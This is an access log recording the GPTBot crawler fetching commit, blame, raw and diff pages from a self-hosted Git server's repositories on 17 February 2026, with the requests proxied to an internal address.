[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" -[17/Feb/2026:14:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22318] [Gzip 12.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22284] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10074] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10102] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" -[17/Feb/2026:14:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:14:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:14:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:14:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11468] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:14:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10062] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18935] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 11042] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:14:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27641] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=update_status.py" [Client 74.7.227.38] [Length 24874] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:14:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 288109] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" -[17/Feb/2026:14:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 288717] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" -[17/Feb/2026:14:43:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.diff" [Client 74.7.227.38] [Length 128259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:14:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.patch" [Client 74.7.227.38] [Length 130059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:14:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:14:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11476] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" -[17/Feb/2026:14:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 316199] [Gzip 14.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 317082] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:43:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.diff" -[17/Feb/2026:14:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" -[17/Feb/2026:14:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49517] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" -[17/Feb/2026:14:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11234] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:14:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11242] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:14:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" [Client 74.7.227.38] [Length 10721] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:14:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17640] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:14:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 18828] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:14:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] 